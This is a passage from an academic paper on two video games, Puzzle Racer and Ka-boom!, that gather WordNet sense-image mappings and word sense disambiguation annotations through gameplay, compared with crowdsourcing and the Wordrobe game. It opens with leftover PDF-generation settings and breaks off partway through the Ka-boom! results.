/AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_e6td4igoavconayt3iw5mwxlsi ---- It’s All Fun and Games until Someone Annotates: Video Games with a Purpose for Linguistic Annotation David Jurgens and Roberto Navigli Department of Computer Science Sapienza University of Rome {jurgens,navigli}@di.uniroma1.it Abstract Annotated data is prerequisite for many NLP applications. Acquiring large-scale annotated corpora is a major bottleneck, requiring sig- nificant time and resources. Recent work has proposed turning annotation into a game to increase its appeal and lower its cost; how- ever, current games are largely text-based and closely resemble traditional annotation tasks. We propose a new linguistic annota- tion paradigm that produces annotations from playing graphical video games. The effec- tiveness of this design is demonstrated using two video games: one to create a mapping from WordNet senses to images, and a sec- ond game that performs Word Sense Disam- biguation. Both games produce accurate re- sults. The first game yields annotation qual- ity equal to that of experts and a cost reduc- tion of 73% over equivalent crowdsourcing; the second game provides a 16.3% improve- ment in accuracy over current state-of-the-art sense disambiguation games with WordNet. 1 Introduction Nearly all of Natural Language Processing (NLP) depends on annotated examples, either for train- ing systems or for evaluating their quality. Typi- cally, annotations are created by linguistic experts or trained annotators. However, such effort is often very time- and cost-intensive, and as a result cre- ating large-scale annotated datasets remains a long- standing bottleneck for many areas of NLP. As an alternative to requiring expert-based anno- tations, many studies used untrained, online work- ers, commonly known as crowdsourcing. When successful, crowdsourcing enables gathering anno- tations at scale; however, its performance is still lim- ited by (1) the difficulty of expressing the annota- tion task as a simply-understood task suitable for the layman, (2) the cost of collecting many anno- tations, and (3) the tediousness of the task, which can fail to attract workers. Therefore, several groups have proposed an alternate annotation method us- ing games: an annotation task is converted into a game which, as a result of game play, produces an- notations (Pe-Than et al., 2012; Chamberlain et al., 2013). Turning an annotation task into a Game with a Purpose (GWAP) has been shown to lead to better quality results and higher worker engagement (Lee et al., 2013), thanks to the annotators being stimu- lated by the playful component. Furthermore, be- cause games may appeal to a different group of peo- ple than crowdsourcing, they provide a complemen- tary channel for attracting new annotators. Within NLP, gamified annotation tasks include anaphora resolution (Hladká et al., 2009; Poesio et al., 2013), paraphrasing (Chklovski and Gil, 2005), term associations (Artignan et al., 2009) and dis- ambiguation (Seemakurty et al., 2010; Venhuizen et al., 2013). The games’ interfaces typically incorpo- rate common game elements such as scores, leader- boards, or difficulty levels. However, the game it- self remains largely text-based, with a strong resem- blance to a traditional annotation task, and little re- semblance to games most people actively play. In the current work, we propose a radical shift in NLP-focused GWAP design, building graphical, dy- namic games that achieve the same result as tradi- tional annotation. Rather than embellish an annota- 449 Transactions of the Association for Computational Linguistics, 2 (2014) 449–463. Action Editor: Mirella Lapata. Submitted 10/2013; Revised 03/2014; Revised 08/2014; Published 10/2014. c©2014 Association for Computational Linguistics. tion task with game elements, we start from a video game that is playable alone and build the task into the game as a central component. By focusing on the game aspect, players are presented with a more fa- miliar task, which leads to higher engagement. Fur- thermore, the video game interface can potentially attract more interest from the large percentage of the populace who play video games. In two video games, we demonstrate how certain linguistic annotation tasks can be effectively repre- sented as video games. The first video game, Puz- zle Racer, produces a mapping between images and WordNet senses (Fellbaum, 1998), thereby creating a large-scale library of visual analogs of concepts. While resources such as ImageNet (Deng et al., 2009) provide a partial sense-image mapping, they are limited to only a few thousand concrete noun senses, whereas Puzzle Racer annotates all parts of speech and both concrete and abstract senses. Fur- thermore, Puzzle Racer’s output enables new visual games for tasks using word senses such as Word Sense Disambiguation, frame detection, and selec- tional preference acquisition. The second game, Ka-boom!, performs Word Sense Disambiguation (WSD) to identify the meaning of a word in context by players interacting with pictures. Sense annota- tion is regarded to be one of the most challenging NLP annotation tasks (Fellbaum et al., 1998; Ed- monds and Kilgarriff, 2002; Palmer et al., 2007; Art- stein and Poesio, 2008), so we view it as a challeng- ing application for testing the limits of visual NLP games. Our work provides the following four contribu- tions. First, we present a new game-centric design methodology for NLP games with a purpose. Sec- ond, we demonstrate with the first game that video games can produce linguistic annotations equal in quality to those of experts and at a cost reduc- tion from gathering the same annotations via crowd- sourcing; with the second game we show that video games provide a statistically significant performance improvement over a current state-of-the-art non- video game with a purpose for sense annotation. Third, we release both games as a platform for other researchers to use in building new games and for annotating new data. Fourth, we provide multiple resources produced by the games: (1) an image li- brary mapped to noun, verb, and adjective Word- Net senses, consisting of 19,073 images across 443 senses, (2) a set of associated word labels for most images, (3) sense annotations as a distribution over images and senses, and (4) mappings between word senses and related Web queries. 2 Related Work Games with a Purpose Multiple works have pro- posed linguistic annotation-based games with a pur- pose for tasks such as anaphora resolution (Hladká et al., 2009; Poesio et al., 2013), paraphrasing (Chklovski and Gil, 2005), term associations (Artig- nan et al., 2009; Lafourcade and Joubert, 2010; Van- nella et al., 2014), acquiring common sense knowl- edge (Kuo et al., 2009; Herdağdelen and Baroni, 2012), and WSD (Chklovski and Mihalcea, 2002; Seemakurty et al., 2010; Venhuizen et al., 2013). Notably, all of these linguistic games have play- ers primarily interacting with text, in contrast to other highly successful games with a purpose such as Foldit (Cooper et al., 2010), in which players fold protein sequences, and the ESP game (von Ahn and Dabbish, 2004), where players label images with words. Most similar to our games are Wordrobe (Ven- huizen et al., 2013) and Jinx (Seemakurty et al., 2010), which perform WSD, and The Knowledge Towers (Vannella et al., 2014), which associates im- ages with senses. Wordrobe asks players to disam- biguate nouns and verbs using multiple choice ques- tions where options are sense definitions and disam- biguation is limited to terms with at most five senses, a limitation that does not exist in our games. Jinx uses two players who both have to independently provide lexical substitutes of an ambiguous word and are then scored on the basis of their shared sub- stitutes. While Jinx has a more game-like feel, pro- ducing annotations from the substitutes is non-trivial and requires looking for locality of the substitutes in the WordNet graph. In contrast to Wordrobe and Jinx, we provide a game-centric design methodology for the seamless integration of the annotation task into a video game with dynamic, graphical elements. The Knowledge Towers (TKT) is a video game for validating the associations between images and word senses in BabelNet (Navigli and Ponzetto, 2012) and associating each of the senses with new 450 images acquired from a Web query of one of the sense’s lemmas. To perform the annotation, players are shown a word and its definition and then asked to retrieve pictures matching that definition during game play. In contrast, our Puzzle Racer game is purely vi- sual and does not require players to read defini- tions, instead showing picture examples, increas- ing its video game-like quality. Furthermore, Puz- zle Racer is tested on nouns, verbs, and adjectives whereas TKT is only applicable to annotate nouns since it relies on the BabelNet knowledge base to acquire its initial set of image-sense associations, which contains images only for nouns. Image Libraries Associating images with con- ceptual entities is a long-standing goal in Com- puter Vision (Barnard et al., 2003) and two ap- proaches have built large-scale image libraries based on the WordNet hypernym ontology. The data set of Torralba et al. (2008) contains over 80M im- ages across all 75,062 non-abstract WordNet noun synsets. However, to support the size of the data set, images are down-scaled to 32x32 pixels; fur- thermore, their image-sense mapping error rates vary between 25-80% with more general concepts having higher error rates. The second significant image library comes from ImageNet (Deng et al., 2009), which contains 3.2M high-resolution images for 5,247 non-abstract WordNet noun synsets. No- tably, both libraries focus only on concrete nouns. In contrast, the present work provides a methodol- ogy for generating image-sense associations for all parts of speech and for both abstract and concrete concepts. Within NLP resources, BabelNet (Navigli and Ponzetto, 2012) merges Wikipedia and Word- Net sense inventories and contains mappings from WordNet senses to the pictures present on the cor- responding Wikipedia page. However, since images come from an encyclopedia, the associations are in- herently limited to only nouns and, due to inherently partial mapping, only 38.6% of the WordNet senses have images, with an average of 3.01 images for those senses. The present work also varies from pre- vious approaches in that image-sense pairs are rated according to the strength of association between the image and sense, rather than having a binary un- graded association. Crowdsourced WSD Many NLP areas have ap- plied crowdsourcing (Wang et al., 2013); of these areas, the most related to this work is crowdsourc- ing word sense annotations. Despite initial success in performing WSD using crowdsourcing (Snow et al., 2008), many approaches noted the difficulty of performing WSD with untrained annotators, espe- cially as the degree of polysemy increases or when word senses are related. Several approaches have attempted to make the task more suitable for un- trained annotators by (1) using the crowd itself to define the sense inventory (Biemann and Nygaard, 2010), thereby ensuring the crowd understands the sense distinctions, (2) modifying the questions to explicitly model annotator uncertainty (Hong and Baker, 2011; Jurgens, 2013), or (3) using sophis- ticated methods to aggregate multiple annotations (Passonneau et al., 2012; Passonneau and Carpen- ter, 2013). In all cases, annotation was purely text based, in contrast to our work. 3 Game 1: Puzzle Racer The first game was designed to fill an important need for enabling engaging NLP games: image repre- sentations of concepts, specifically WordNet senses. Our goals are two-fold: (1) to overcome the limits of current sense-image libraries, which have focused largely on concrete nouns and (2) to provide a gen- eral game platform for annotation tasks that need to associate lexical items with images. Following, we first describe the design, annotation process, and ex- tensibility of the game, and then discuss how its in- put data is generated. A live demonstration of the game is available online.1 3.1 Design and Game Play Puzzle Racer was designed to be as “video game- like” as possible, with no mentioning of linguistic terminology. Because the game is targeted for the layperson, we view this a fundamental design ob- jective to make the game more engaging and long- lasting. Therefore, Puzzle Racer is modeled after popular games such as Temple Run and Subway Surfers, but with the twist of combining two game genres: racing and puzzle solving. Racing provides the core of game play, while the annotation is em- bedded as puzzle solving during and after the race. 1http://www.knowledgeforge.org 451 Following, we describe the game play and then de- tail how playing produces annotations. Racing To race, players navigate a race car along a linear track filled with obstacles and enemy pieces. During play, players collect coins, which can be used to obtain non-annotation achievements and to increase their score. Enemies were added to intro- duce variety into the game and increase the strategy required to keep playing. Players begin the race with 2–4 health points, depending on the racer chosen, which are decreased when touching enemies. Dur- ing game play, players may collect power-ups with familiar actions such as restoring lost health, dou- bling their speed, or acting as a magnet to collect coins. To bring a sense of familiarity, the game was designed using a combination of sprites, sound ef- fects, and music from Super Mario World, Mario Kart 64, and custom assets created by us. Races initially last for 90 seconds, but may last longer if players collect specific power-ups that add time. Puzzle Solving Prior to racing, players are shown three images, described as “puzzle clues,” and in- structions asking them to find the common theme in the three pictures (Fig. 1a). Then, during rac- ing, players encounter obstacles, referred to as puz- zle gates, that show a series of images. To stay alive, players must navigate their racer through the one picture in the series with the same theme as the puzzle clues. Players activate a gate after touching one of its images; a gate may only be activated once and racer movement over other pictures has no ef- fect. Puzzle gates appear at random intervals during game play. Two types of gate appear. In the first, the gate shows pictures where one picture is known to be re- lated to the puzzle clues. We refer to these as golden gates. Racing over an unrelated image in a golden gate causes the player to lose one health point, which causes the race to end if their health reaches zero. The second type of gate, referred to as a mystery gate, shows three images that are potentially related to the clue. Moving over an image in a mystery gate has no effect on health. Prior to activating a gate, there is no visual difference between the two gates. Figure 1b shows a racer approaching a puzzle gate. Upon first moving their racer on one of the gate’s images, the player receives visual and audi- tory feedback based on the type of gate. In the case of a golden gate, the borders around all pic- tures change colors showing which picture should have been selected, a feedback icon appears on the chosen picture (shown in Figure 1c), and an appro- priate sound effect plays. For mystery gates, borders become blue, indicating the gate has no effect. Finally, when the race ends, players are asked to solve the race’s puzzle by entering a single word that describes the race’s puzzle theme. For example, in the race shown in Figure 1, an answer of “paper” would solve the puzzle. Correctly answering the puzzle doubles the points accumulated by the player during the race. The initial question motivates play- ers to pay attention to picture content shown during the race; the longer the player stays alive, the more clues they can observe to help solve the puzzle. Annotation Image-sense annotation takes place by means of the puzzle gates. Each race’s puzzle theme is based on a specific WordNet sense. Ini- tially, each sense is associated with a small set of gold standard images, G, and a much larger set of potentially-associated images, U, whose quality is unknown. At the start of a race, three gold stan- dard images are randomly selected from G to serve as puzzle clues. The details of gold standard image selection are described later in Sec. 3.2. We note that not all gold standard images are shown initially as puzzle clues, helping mask potential differences between golden and mystery gates. Mystery gates annotate the images in U. The im- ages in a mystery gate are chosen by selecting the least-rated image in U and then pairing it with n- 1 random images from U, where n is the number of pictures shown per gate. By always including the least-rated image, we guarantee that, given sufficient plays, all images for a sense will eventually be rated. When a player chooses an image in the mystery gate, that image receives n-1 positive votes for it being a good depiction of the sense; the remaining unse- lected images receive one negative vote. Thus, an image’s rating is the cumulative sum of the positive and negative votes it receives. This rating scheme is zero-sum so image ratings cannot become inflated such that all images have a positive rating. How- ever, we do note that if U includes many related im- ages, due to the voting, some good images may have 452 (a) Puzzle clues (b) A puzzle gate prior to activation (c) An activated puzzle gate Figure 1: Screenshots of the key elements of the Puzzle Racer game negative ratings if even-better images become higher ranked. Golden gates are used to measure how well a player understands the race’s puzzle concept (i.e., the sense being annotated). The first three puzzle gates in a race are always golden gates. We denote the percentage of golden gates correctly answered thus far as α. After the three initial golden gates are shown, the type of new puzzle gates is metered by α: golden gates are generated with probability 0.3 + 0.7(1 − α) and mystery gates are generated for the remainder. In essence, accurate players with high α are more likely to be shown mystery gates that annotate pictures from U, whereas completely inaccurate players are prevented from adding new annotations. This mechanism adjusts the number of new annotations a player can produce in real- time based on their current accuracy at recogniz- ing the target concept, which is not currently pos- sible in common crowdsourcing platforms. Last, we note that puzzle answering also provides labels for the race’s images, data that might prove valu- able for tasks such as image labeling (Mensink et al., 2013) and image caption generation (Feng and Lapata, 2013; Kulkarni et al., 2013). Additional Game Elements Puzzle Racer incor- porates a number of standard Game with a Purpose design elements (von Ahn and Dabbish, 2008), with two notable features: unlockable achievements and a leaderboard. Players initially start out with a sin- gle racer and power-up available. Players can then unlock new racers and power-ups through various game play actions of varying difficulty, e.g., cor- rectly answering three puzzle questions in a row. This feature proved highly popular and provided an extrinsic motivation for continued playing. Sec- ond, players were ranked according to level, which was determined by the number of correct puzzle an- swers, correct golden gates, and their total score. The top-ranking players were shown at the end of every round and via a special screen in-game. A full, live-updated leaderboard was added halfway through the study and proved an important feature for new players to use in competing for the top ranks. Extensibility At its core, Puzzle Racer provides three central annotation-related mechanics: (1) an initial set of instructions on how players are to inter- act with images, (2) multiple series of images shown during game play, and (3) an open-ended question at the end of the game. These mechanics can be easily extended to other types of annotation where players must choose between several concepts shown as op- tions in the puzzle gates. For example, the instruc- tions could show players a phrase such as “a bowl of *” and ask players to race over images of things that might fit the “*” argument in order to obtain se- lectional preference annotations of the phrase (à la Flati and Navigli (2013)); the lemmas or senses as- sociated with the selected images can be aggregated to identify the types of arguments preferred by play- ers for the game’s provided phrase. Similarly, the in- structions could be changed to provide a set of key- words or phrases (instead of images associated with a sense) and ask players to navigate over images of the words in order to perform image labeling. 453 Nouns argument, arm, atmosphere, bank, difficulty, disc, interest, paper, party, shelter Verbs activate, add, climb, eat, encounter expect, rule, smell, suspend, win Adjectives different, important, simple Table 1: Lemmas for Puzzle Racer and Ka-boom! 3.2 Image Data Puzzle Racer requires sets of images G and U as in- put. Both were constructed using image queries via the Yahoo! Boss API as follows. Three annotators were asked to each produce three queries for each sense of a target word and, for each query, to se- lect three images as gold standard images. Queries were checked for uniqueness and to ensure that at least a few of its image results were related to the sense. Each query was used to retrieve one result set of 35 images. Two additional annotators then vali- dated the queries and gold standard images produced by the first three annotators. Validation ensured that each sense had at least three queries and |G| ≥ 6 for all senses. After validation, the gold standard im- ages were added to G and all non-gold images in the result set were added to U, discarding duplicates. During game play, puzzle clues are sampled across queries, rather than sampling directly from G. Query-based sampling ensures that players are not biased towards images for a single visual repre- sentation of the sense. While the construction of G and U is manual, we note that alternate methods of constructing the sets could be considered, including automatic ap- proaches such as those used by ImageNet (Deng et al., 2009). However, as the focus of this game is on ranking images, a manual process was used to en- sure high-quality images in G. Importantly, we stress that the images in G alone are often insufficient due to two reasons. First, most senses – especially those denoting abstract concepts – can be depicted in many ways. Relying on a small set of images for a sense can omit common visual- izations, which may limit downstream applications that require general representations. Second, many games rely on a sense of novelty, i.e., not seeing the same pictures repeatedly; however, limiting the im- ages to those in G can create issues where too few disc4n: a flat circular plate circular plate dish plate plate paper3n: a daily or weekly publication on folded sheets news paper daily newspaper newspaper headline simple2a: elementary, simple, uncomplicated simple problem 1+1=2 elementary equation win1v: be the winner in a contest or competition olympic winner lottery winner world cup victory Table 2: Examples of queries used to gather images images exist to keep player interest high. While ad- ditional manual annotation could be used to select more gold standard images, such a process is time- intensive; hence, one of our game’s purposes is to eventually move high-quality images from U to G. 4 Puzzle Racer Annotation Analysis Puzzle Racer is intended to produce a sense-image mapping comparable to what would be produced by crowdsourcing. Therefore, we performed a large- scale study involving over 100 players and 16,000 images. Two experiments were performed. First, we directly compared the quality of the game-based an- notations with those of crowdsourcing. Second, we compared the difference in quality between expert- based gold standard images and the highest-ranked images rated by players. 4.1 Experimental Setup To test the potential of our approach, we selected a range of 23 polysemous noun, verb, and adjec- tive lemmas, shown in Table 1. Lemmas had 4-10 senses each, for a total of 132 senses. Many lemmas have both abstract and concrete senses and some are known to have highly-related senses (Erk and Mc- Carthy, 2009). Hence, given their potential annota- tion difficulty, we view performance on these lem- mas as a lower bound. For all lemmas, during the image generation pro- cess (Sec. 3.2) annotators were able to produce queries for all but one sense, expect2v; 2 this produced 1356 gold images in G and 16,656 unrated images 2The sense expect2v has the definition, “consider obligatory; request and expect.” Annotators were able to formulate many queries that could have potentially shown images of this defi- nition, but the images results of such queries were consistently unrelated to the meaning. 454 interest1n: a sense of concern with and curiosity about someone or something eat1v: take in solid food different 1 a: unlike in nature or quality or form or degree party2n: a group of people gathered to- gether for pleasure expect6v: be pregnant with shelter 5 n: temporary housing for home- less or displaced persons Table 3: Examples of gold standard images in U. Tables 2 and 3 show examples of the queries and gold standard images, respectively. The game play study was conducted over two weeks using a pool of undergraduate students, who were allowed to recruit other students. After an email announcement, 126 players participated. Players were ranked according to their character’s level and provided with an incentive that the four top-ranking players at the end of the study would be provided with gift cards ranging from $15-25USD, with a total compensation of $70USD. 4.2 Experiment 1: Crowdsourcing Comparison The first experiment directly compares the image rankings produced by the game with those from an analogous crowdsourcing task. Tasks were created on the CrowdFlower platform using the identical set of examples and annotation questions encoun- tered by players. In each task, workers were shown three example gold standard images (sampled from those configurations seen by players) and asked to identify the common theme among the three exam- ples. Then, five annotation questions were shown in which workers were asked to choose which of three images was most related to the theme. Ques- tions were created after the Puzzle Racer study fin- ished in order to use the identical set of questions seen by players as mystery gates. Workers were paid $0.03USD per task. To compare the quality of the Puzzle Racer image rankings with those from CrowdFlower, the three highest-rated images of each sense from both rank- ings were compared. Two annotators were shown a sense’s definition and example uses, and then asked to compare the quality of three image pairs, select- ing whether (a) the left image was a better depic- tion of the sense, (b) the right image was better, or (c) the images were approximately equal in quality. In the case of disagreements, a third annotator was asked to compare the images; the majority answer was used when present or, in the case of all three ratings, images were treated as equal, the latter of which occurred for only 17% of the questions. For all 396 questions, the method used to rank the image was hidden and the order in which images appeared was randomized. Results During the study period, players com- pleted 7199 races, generating 20,253 ratings across 16,479 images. Ratings were balanced across senses, with a minimum and maximum of 231 and 329 ratings per sense. Players accurately identi- fied each race’s theme, selecting the correct image in 83% of all golden puzzle gates shown. Table 4 shows example top-rated images from Puzzle Racer. Experiment 1 measures differences in the qual- ity of the three top-ranked images produced by Puz- zle Racer and CrowdFlower for each sense. Puzzle Racer and CrowdFlower produced similar ratings, with at least one image appearing in the top-three positions of both ranks for 55% of the senses. Both annotators agreed in 72% of cases in select- ing the best sense depiction, finding that in 88% of the agreed cases both images were approximately equal representations of the sense. In the remain- ing, the Puzzle Racer image was better in 4% and 455 activate4v: aerate (sewage) so as to favor the growth of organisms that decompose organic matter argument2n: a contentious speech act; a dispute where there is strong disagree- ment atmosphere4n: the weather or climate at some place climb1v: go upward with gradual or con- tinuous progress important1a: of great significance or value rule2v: decide with authority Table 4: Examples of the three highest-rated images for six senses CrowdFlower image better in 8%. When resolu- tions from a third annotator were included, a similar trend emerges: both images were equivalent in 79% of all cases, Puzzle Racer images were preferred in 7% and Crowflower images in 14%. These results show that, as a video game, Puzzle Racer produces very similar results to what would be expected under equivalent conditions with crowdsourcing. 4.3 Experiment 2: Image Quality The second experiment evaluates the ability of the games to produce high-quality images by measur- ing the difference in quality between gold stan- dard images and top-rated images in the game. CrowdFlower workers were shown a question with a sense’s definition and example uses and then asked to choose which of two images was a better visual representation of the gloss. Questions were created for each of the three highest-rated images for each sense, pairing each with a randomly-selected gold standard image for that sense. Image order was ran- domized between questions. Five questions were shown per task and workers were paid $0.05USD per task.3 The 2670 worker responses were aggre- gated by selecting each question’s most frequent an- swer. Results For senses within each part of speech, workers preferred the gold standard image to the 3Workers were paid more for the second task to adjust for the time required to read each question’s sense definition and example uses; thus, hourly compensation rates in the two ex- periments were approximately equivalent. top-rated image for nouns, verbs, and adjectives 57.4%, 53.1%, and 56.2% of the time, respectively. This preference is not significant at p < 0.05, indi- cating that the top-ranked images produced through Puzzle Racer game play are approximately equiva- lent in quality to images manually chosen by experts with full knowledge of the sense inventory. 4.4 Cost Comparison Puzzle Racer annotations cost $70, or $0.0034USD per rating. In comparison, the analogous Crowd- Flower annotations cost $256.60, or $0.0126USD per annotation. Because the game’s costs are fixed, the cost per annotation is driven down as players compete. As a result, Puzzle Racer reduces the an- notation cost to ≤27% of that required by crowd- sourcing. We note that other factors could have con- tributed to the cost reduction over crowdsourcing be- yond the video game itself. However, as we demon- strate in Vannella et al. (2014), players will play a video game with a purpose without compensation just as much as they do when compensated using a similar setup as was performed in this experiment. Hence, the video game itself is likely the largest mo- tivating factor for the cost reduction. Video game-based annotation does come with in- direct costs due to game development. For example, Poesio et al. (2013) report spending £60,000 over a two-year period to develop their linguistic game with a purpose. In contrast, Puzzle Racer was cre- ated using open source software in just over a month and developed in the context of a Java programming class, removing any professional development costs. 456 Furthermore, Puzzle Racer is easily extensible for other text-image annotation tasks, enabling the plat- form to be re-used with minimal effort. The decreased cost does come with an increase in the time per annotation. All tasks on the Crowd- Flower platform required only a few hours to com- plete, whereas the Puzzle Racer data was gathered over the two-week contest period. The difference in collection time reflects an important difference in the current resources: while crowdsourcing has established platforms with on-demand workers, no central platforms exist for games with a purpose with an analogous pool of game players. However, although the current games were released in a lim- ited fashion, later game releases to larger venues such as Facebook may attract more players and sig- nificantly decrease both collection times and overall annotation cost. 5 Game 2: Ka-boom! Building large-scale sense-annotated corpora is a long-standing objective (see (Pilehvar and Navigli, 2014)) and has sparked significant interest in de- veloping effective crowdsourcing annotation and GWAP strategies (cf. Sec. 2). Therefore, we pro- pose a second video game, Ka-boom!, that produces sense annotations from game play. A live demon- stration of the game is available online.4 Design and Game Play Ka-boom! is an action game in the style of the popular Fruit Ninja game: pictures are tossed on screen from the boundaries of the screen, which the player must then selectively destroy in order to score points. The game’s chal- lenge stems from rapidly identifying which pictures should be destroyed or not destroyed as they appear. Prior to the start of a round, players are shown a sentence with a word in bold (Fig. 2a) and asked to envision pictures related to that word’s meaning in the context. Players are then instructed to de- stroy pictures that do not remind them of the bolded word’s meaning and let live pictures showing some- thing reminiscent. Once finished reading the instruc- tions, players begin a round of game play that shows (1) images for each sense of the word and (2) im- ages for unrelated lemmas, referred to as distractor images. 4http://www.knowledgeforge.org/ Players destroy pictures by clicking or touching them, depending on their device’s input (Fig. 2b). Players are penalized for failing to destroy the dis- tractor images. Rounds begin with a limit of at most three pictures on screen at once, which increases as the round progresses. The additional images pro- vide two important benefits: (1) an increasing de- gree of challenge to keep the player’s interest, (2) more image interactions to use in producing the an- notation. Additionally, the increasing picture rate enables us to measure the interaction between game play speed and annotation quality in order to help tune the speeds of future games. The round ends when players fail to destroy five or more distrac- tor images or 60 seconds elapses. Ending the game early after players fail to destroy distractor images provides Ka-boom! a mechanism for limiting the impact of inaccurate or adversarial players on anno- tation quality. After game play finishes, players are shown their score and all the lemma-related pictures they spared (Fig. 2c), proving a positive feedback loop where players can evaluate their choices. Annotation Traditionally, sense annotation is per- formed by having an annotator examine a word in context and then chose the word’s sense from a list of definitions. Ka-boom! replaces the sense defini- tions with image examples of that sense. A sense an- notation is built from the senses associated with the images that the player spared. Images are presented to players based on a sequence of flights. Each flight contains one randomly-selected picture for each of a word’s n senses and n distractor images. Images within a flight are randomly ordered. The structure of a flight’s images ensures that, as the game pro- gresses, players see the same number of images for each sense; otherwise, the player’s annotation may become biased simply due to one sense’s images ap- pearing more often. Once the game ends, the senses associated with the spared images are aggregated to produce a sense distribution. For simplicity, the sense with the high- est probability is selected as the player’s answer; in the case of ties, multiple senses are reported, though, we note that the game’s annotation method could also produce a weighted distribution over senses (Erk et al., 2012), revealing different meanings that a player considered valid in the context. 457 (a) The context and target word (b) Players destroying images (c) The round-over summary Figure 2: Screenshots of the three key elements of the Ka-boom! game The highest probability of a sense from this distri- bution is then multiplied by the duration of the game to produce the player’s score for the round. Players maximize their score when they consistently choose images associated with a single sense, which encour- ages precise game play. The annotation design of having players destroy unrelated images was motivated by two factors. First, the mechanism of destroying unrelated images does not introduce noise into the annotation when a player mistakenly destroys an image; because only retained images count towards the sense annotation, players may be highly selective in which images they retain – even destroying some images that are associated with the correct sense – while still pro- ducing a correct annotation. Second, our internal testing showed the objective of destroying unrelated pictures keeps players more actively engaged. In the inverse type of play where players destroy only re- lated pictures, players often had to wait for a single picture to destroy, causing them to lose interest. Extensibility Ka-boom! contains two core me- chanics: (1) instructions on which pictures should be destroyed and which should be spared, and (2) series of images shown to the player during game play. As with Puzzle Racer, the Ka-boom! mechan- ics can be modified to extend the game to new types of annotation. For example, instructions could dis- play picture examples and ask players to destroy ei- ther similar or opposite-meaning ideas in order to annotate synonyms or antonyms. In another setting, images can be associated with semantic frames (e.g., from FrameNet (Baker et al., 1998)) and players must spare images showing the frame of the game’s sentence in order to provide frame annotations. 6 Ka-boom! Annotation Analysis Ka-boom! is intended to provide a complementary and more-enjoyable method for sense annotation us- ing only pictures. To test its effectiveness, we per- form a direct comparison with the state-of-the-art GWAP for sense annotation, Wordrobe (Venhuizen et al., 2013), which is not a video game. 6.1 Experimental Setup Organizers of the Wordrobe project (Venhuizen et al., 2013) provided a data set of 111 recently- annotated contexts having between one and nine games played for each (mean 3.2 games). This data was distinct from the contexts used to evaluate Wor- drobe in Venhuizen et al. (2013) in which case all contexts had six games played each. Contexts were for 74 noun and 16 verb lemmas with a total of 310 senses (mean 3.4 senses per word). Contexts were assigned the most-selected sense label from the Wor- drobe games. To gather the images for each lemma used with Ka-boom!, we repeated a similar image-gathering process as done for the gold standard images in Puzzle Racer. Annotators generated at least three queries for each sense, selecting three images for each query as gold standard examples of the sense. During annotation, four senses could not be asso- ciated with any queries that produced high-quality images. In total, 2594 images were gathered, with an average of 8.36 images per sense. The query data and unrated images are included in the data set, but were not used further in Ka-boom! experiments. Game players were drawn from a small group of 458 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 2 3 4 5 6 7 8 9 A v e ra g e W S D A c c u ra c y Flights of pictures seen All Nouns Verbs MFS Random Figure 3: Players’ average WSD accuracy within a single game relative to the number of flights seen Accuracy Method All Noun Verb Ka-boom! 0.766 0.803 0.559 Wordrobe 0.603 0.659 0.313 MFS 0.678 0.702 0.588 Random 0.322 0.325 0.312 Table 5: Sense disambiguation accuracies fluent English speakers and were free to recruit other players. A total of 19 players participated. Unlike Puzzle Racer, players were not compensated. Each context was seen in at least six games. WSD performance is measured using the tradi- tional precision and recall definitions and the F1 measure of the two (Navigli, 2009); because all items are annotated, precision and recall are equiv- alent and we report performance as accuracy. Per- formance is measured relative to two baselines: (1) a baseline that picks the sense of the lemma that is most frequent in SemCor (Miller et al., 1993), de- noted as MFS, and (2) a baseline equivalent to per- formance if players had randomly clicked on im- ages, denoted as Random.5 6.2 Results Two analyses were performed. Because Ka- boom! continuously revises the annotation during gameplay based on which pictures players spare, the first analysis assesses how the accuracy changes 5This baseline is similar to random sense selection but takes into account differences in the number of pictures per sense. with respect to the length of one Ka-boom! game. The second analysis measures the accuracy with re- spect to the number of games played per context. In the first analysis, each context’s annotation was evaluated using the most-probable sense after each flight of gameplay. Figure 3 shows results after six games were played. Players were highly accurate at playing, surpassing the MFS baseline after see- ing two flights of pictures (i.e., two pictures for each sense). Accuracy remained approximately equiva- lent after three rounds for noun lemmas, while verb lemmas showed a small drop-off in performance. We believe that the increased rate at which images occur on screen likely caused lower performance, where players were unable to react quickly enough. Many noun lemmas had easily-recognizable associ- ated images, so higher-speed game play may still be accurate. In contrast, verbs were more general (e.g., “decide,” “concern,” and “include”), which required more abstract thinking in order to recognize an asso- ciated picture; as the game speed increased, players were not able to identify these associated pictures as easily, causing slightly decreased performance. Table 5 shows the players’ disambiguation accu- racy after three flights in comparison to the play- ers’ accuracy with Wordrobe and the two baselines. Ka-boom! provides an increased performance over Wordrobe that is statistically significant at p < 0.01.6 Ka-boom! also provides a performance in- crease over the MFS baseline, though it is statisti- cally significant only at p = 0.14. The time required to gather annotations after three flights varied based on the number of senses, but was under a minute in all cases, which puts the rate of annotation on par with that of expert-based annotation (Krishnamurthy and Nicholls, 2000). In the second analysis, disambiguation accuracy was measured based on the number of games played for a context.7 Because the provided Wordrobe data set has 3.2 games played per context on aver- age, results are reported only for the subset of con- texts played in at least four Wordrobe games in or- der to obtain consistent performance estimates. Ka- 6We note that, although Venhuizen et al. (2013) report a higher accuracy for Wordrobe in their original experiments (85.7 F1), that performance was measured on a different data set and used six games per context. 7In all cases, players played at most one game per context. 459 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 2 3 4 5 6 A v e ra g e W S D A c c u ra c y Number of Games Played Ka-boom! All Ka-boom! Nouns Ka-boom! Verbs MFS Wordrobe All 